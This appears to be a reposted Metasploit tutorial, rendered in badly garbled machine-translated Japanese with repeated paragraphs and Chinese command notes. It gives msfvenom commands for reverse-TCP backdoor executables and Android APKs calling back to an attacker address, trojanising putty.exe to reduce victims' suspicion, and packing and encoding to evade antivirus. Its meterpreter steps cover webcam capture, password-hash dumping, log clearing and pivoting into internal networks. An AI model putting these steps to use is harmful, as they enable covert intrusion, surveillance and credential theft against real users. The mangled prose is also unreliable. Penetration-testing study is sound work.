Metasploitのは、入門チュートリアル

0.Metasploitプロフィール

Metasploitのは、オープンソースの侵入テストフレームワークのプラットフォームで、これまでのところ、MSFは、モジュールおよび侵入テストツールに関連する開示された脆弱性の数千を構築し、必要に応じて、モジュールにユーザを可能にするRuby言語は、モジュール適切な修正を加えて、でも自分自身を呼び出すと、テストモジュールを書きました。攻撃モジュールは、選択の使用を必要とした後、あなただけの脆弱性、浸透プロセスの自動化、簡素化をテストするために行うことができ、いくつかのパラメータを設定して利用するために簡単なコマンドを使用する必要があります。

1.Metasploitインストール

Windowsのプラットフォーム

まず、公式サイトからインストーラをダウンロード:
http://downloads.metasploit.com/data/releases/metasploit-latest-windows-installer.exe
デフォルトのポート:3650

インストーラを実行するには、管理者としてアンチウイルスソフトウェアを閉じた後、インストールプロセスは、検索を高速化、など負荷として、各モジュール内Metasploitのインデックスを格納するためのインストールPostgreSQLデータベースに含まれています

インストール後、デスクトップのショートカットは、Metasploitのを生成するために右のMetasploitのコンソールを開き、実行するには、管理者CMDとして実行します

Windowsを起動するときMetasploitの長い時間をロードするために、反応の不在は3-5分待ってください。

Windowsプラットフォームでは、Metasploitのも運用グラフィックを実現するためにWebアクセスインタフェースを提供します

Linuxプラットフォーム

githubのから取得

git clone https://github.com/rapid7/metasploit-framework.git

開始msfconsol Metasploitのフレームワークディレクトリに切り替えて、与えられた権限を実行し
たCD-Metasploitのフレームワーク&& chmodの+ X msfconsole && ./msfconsoleを

再びプログラムキーのインストール、特にネットワークインストールの進捗状況をダウンロードするには、次のコマンドを使用して

cd /opt &&  curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod +x msfinstall && ./msfinstall

カーリーLinuxは、Metasploitの侵入ツールと自動化アーミテージが付属しています

Androidプラットフォーム

場合アンドリュースMetasploitのは、実際のLinuxアンドリュースサブシステムにインストールされてインストールし、プロセスが複雑で面倒であるが、これに基づきMetasploitのインストールが、浸透は、ネットワークにアクセスすることができるラップトップを運ぶ、企業ネットワーク環境で測定あまりにも目立つだろう、Android携帯電話やタブレットのMetasploitの上にインストールこの場合は十分に選択肢かもしれ

前提条件:Androidの携帯電話またはタブレットのroot権限が必要です

通常、基本的な環境としてTermuxをインストールすることを選択し、=システムは、様々な長さのネットワーク環境に応じて、特定の時間に物事をダウンロードを開始しますので、あなたは、この時点で昼寝や何かを取ることを選択することができます。=#

Termuxは、次のコマンドのアップデートを実行し、aptパッケージマネージャを使用します

apt-get update && apt-get upgrade -y && apt dist-upgrade -y

そして、次のインストールMetasploitのLinuxプラットフォームが同じインストールすると

2. Metasploitの侵入テストを使用します

一般ターミナルMSFでコマンドを使用するはじめに

msfdb init                              msf数据库初始化
apt install metasploit framework        msf更新
msfVENOM                                多平台攻击载荷生成器
msf-nasm_shell                          将汇编指令转换成为对应的16进制机器码
msfconsole                              打开msf终端

はじめは、一般的に、端末MSFでコマンドを使用するには

db_status           查看数msf据库连接状态,连接数据库能够优化搜索等过程

db_rebuild_cache    重建缓存,将模块等索引重新存入数据库

db_nmap             调用nmap扫描,并将扫描结果存入数据库

help [db_connect]   显示命令的帮助信息

search [module]     搜索含有关键字的模块

use [module]        选择使用一个模块(以ms17_010永恒之蓝为例)

show payload        显示该模块支持的payload

show options        显示该模块需要设置的参数(其中required为no的表示不是必须的参数)

info                如果觉得show命令显示的不够完整可以直接输入info查看详细详细

set [opt]           使用模块后,设置模块所需要的参数的值(对应使用unset取消设置的值)

setg [opt]          设置全局参数,对于ip之类的参数可以设置为全局,当切换模块后就不需要再次设置ip参数(对应使用unsetg取消设置)

back                返回上级状态

exploit/run         两个命令都表示运行攻击模块

sessions            查看当前连接的会话

トロイの木馬ファイルを生成msfvenom 3.

選択にTペイロードは、ファイアウォールなどの様々な理由のために、ターゲットホスト内部ネットワークポートの一部、あるいは単にいくつかのポートがオープンの外部ネットワークへのアクセスを制限した後、他のすべてのポートを閉じることができます。この場合、バックターゲットホストはそうであっても、このモデルでは、セキュリティ設定をバイパスすることができますので、その外部接続要求が通常の流れであることを確認するために、ターゲットホストに相当し、攻撃者がより良い選択肢であることを可能にします逆バンドペイロードペイロードを選択する際に一般的な選択を使用しています。

通常の窓/ meterpreter_reverse_tcpを使用して32と64の窓/ x64の/ meterpreter_reverse_tcpを使用。もちろん、今でも様々なニーズに応じて様々な負荷を選択する必要が
利用できるロード/エンコーダ/のNOP /全てのリストを表示します

msfvenom -l payload/encoders/nops/all

トロイの木馬指定-fフォーマットを使用して生成することができるビュートロイの木馬ファイル形式

msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=192.168.16.99 lport=4444 -a x64 -f exe -o backdoor_raw.exe

トロイの木馬はアンドリュースを生成しました

msfvenom -p android/meterpreter_reverse_tcp lhost=192.168.16.99 lport=4444 -o backdoor_raw.apk

MSF端末モニターしませんでも答え

use exploit/multi/handler           该模块用于接收回连会话,一般只需要设置监听主机和端口号

4.殺すために自由トロイの木馬

混合使用、複数の符号化のために複数のエンコーダは、
トロイの木馬が実行されない場合がありますまたは実行が攻撃の終わりに戻って接続することはできません後に殺害率、長い符号化時間、そして得られたような状況を回避するために推奨されていませんが、可能でしょう
「生-f」オリジナルのトロイの木馬の世代を表し、トロイの木馬によって生成され、このパイプラインはだけなので、最後のコマンドで生成されたフォーマットを指定する必要があり、合格し続ける必要があり、その前の生オリジナルのトロイの木馬を使用する必要があります

通常のファイルにバンドル
推奨、バンドルは実際の生活の中で、通常のファイルにトロイの木馬後の彼らの警戒を緩和することができます、我々は公式の付いたファイルのハッシュ値よりも注意を払う必要が
結合標的の選択、それが表示され同梱した後動作しない場合がありますケースは、このケースでは、エンコーダを使用しようとする、又は置換対象はパテに、本明細書の実施例の方法によって、結合します

msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=192.168.16.99 lport=4444 -x putty.exe -k -f exe -o backdoor_putty.exe

パッカーズ
推奨、ソフトはある程度の検出殺す回避するパッカー技術は、一般的に使用されるLinux上でここで使用UPXパッカーは、例えば、パック、Windows上の多くのツールがあり、選択することができます
UPXを-5 backdoor_raw.elf -5 -hコマンド圧縮レベル(1-9)、詳細な基準UPX示す
包括的なを用いる方法の上方
トロイの木馬オンラインテストサイトアタッチhttp://www.virscan.org/を

通常のファイルにバンドル
推奨、バンドルは実際の生活の中で、通常のファイルにトロイの木馬後の彼らの警戒を緩和することができます、我々は公式の付いたファイルのハッシュ値よりも注意を払う必要が
結合標的の選択、それが表示され同梱した後動作しない場合がありますケースは、このケースでは、エンコーダを使用しようとする、又は置換対象はパテに、本明細書の実施例の方法によって、結合します

パッカーズ
推奨、ソフトはある程度の検出殺す回避するパッカー技術は、一般的に使用されるLinux上でここで使用UPXパッカーは、例えば、パック、Windows上の多くのツールがあり、選択することができます
UPXを-5 backdoor_raw.elf -5 -hコマンド圧縮レベル(1-9)、詳細な基準UPX示す
包括的なを用いる方法の上方
トロイの木馬オンラインテストサイトアタッチhttp://www.virscan.org/を

5.meterpreter使用浸透した後、

/マルチ/ハンドラモニタモジュールを利用し、ターゲットホストとの接続を確立することによって、meterpreterを使用して浸透を用いて行うことができます

pwd                 打印当前工作目录

sysinfo             查看系统信息

ps                  查看当前目标机上运行的进程列表和pid

webcam_snap         调用相机拍摄照片(使用webcam_stream能够通过浏览器模拟录像机,实现实时监控)

run vnc             运行vnc远程查看屏幕(run screen_unlock实现远程控制)

run post/windows/manage/enable_rdp          如果目标主机是windows系统,使用该命令开启目标的远程桌面3389

screenshot          截取目标主机当前屏幕

getuid              获取当前权限的用户id

getsystem           获取system权限

hashdump            获取用户名与hash口令

shell               获取目标主机shell(windows环境下中文乱码的解决办法:chcp 65001

Ctrl+Z              退出shell模式,返回到meterpreter

upload              上传一个文件

download            下载一个文件

excute              执行目标系统中的文件(-f 指定文件,-i执行可交互模式,-H隐藏窗口)

clearev             清除日志

background          将Meterpreter放入后台(使用session -i重新连接到会话)

6.Meterpreterは、ネットワーク侵入プロフィール内で行います

浸潤の間に、あなたはまた、内部のローカルエリアネットワークに接続することができ、およびLAN内の他のホストが外にアクセスする権限を持っていないホスト単位の公衆ネットワークのホストに接続するための許可を得ることができるとき。これは非常に一般的なLANモードで、通常は数ホスト以内にいくつかの機密文書を保存することができ、ネットワークの外に接続できない、と今内部の実装のために、その内部ネットワークにアクセスする攻撃者のための踏み台としてホストによって制御することができます浸透ネットワーク
到達範囲を追加するために、ネットワーク内のルーティング

run get_local_subnets                   获取目标主机上的子网状态,其中192.168.16.0和攻击机在同一个网段,169.254.0.0是vritualbox的内部网卡模式

run autoroute -s 169.254.0.0/16 1        使用autoroute模块添加到达内网的路由经session 1转发

run autoroute -p                         查看当前的路由表,可以看到发往169.254.0.0网段的流量都将通过session 1转发

接下来就可以在msf下使用db_nmap扫描内网存活主机,针对内网的开放端口进行攻击
portfwd端口转发
端口转发能够将内网端口转发到本地主机的端口,相当于virtualbox的端口映射功能。
portfwd -h                                          查看帮助信息

portfwd add -l 7070 -r 192.168.16.59 -p 3389        将目标主机192.168.16.59的3389转发到本地主机的7070端口

rdesktop 127.0.0.1:7070                             端口转发成功后就可以从本地端口连接rdp

参考図書「Metasploitのザ・ペネトレーションテスターズ・ガイド」「Metasploitの侵入テストガイド(改訂版)」

おすすめ

転載: www.cnblogs.com/dyanbk/p/11258303.html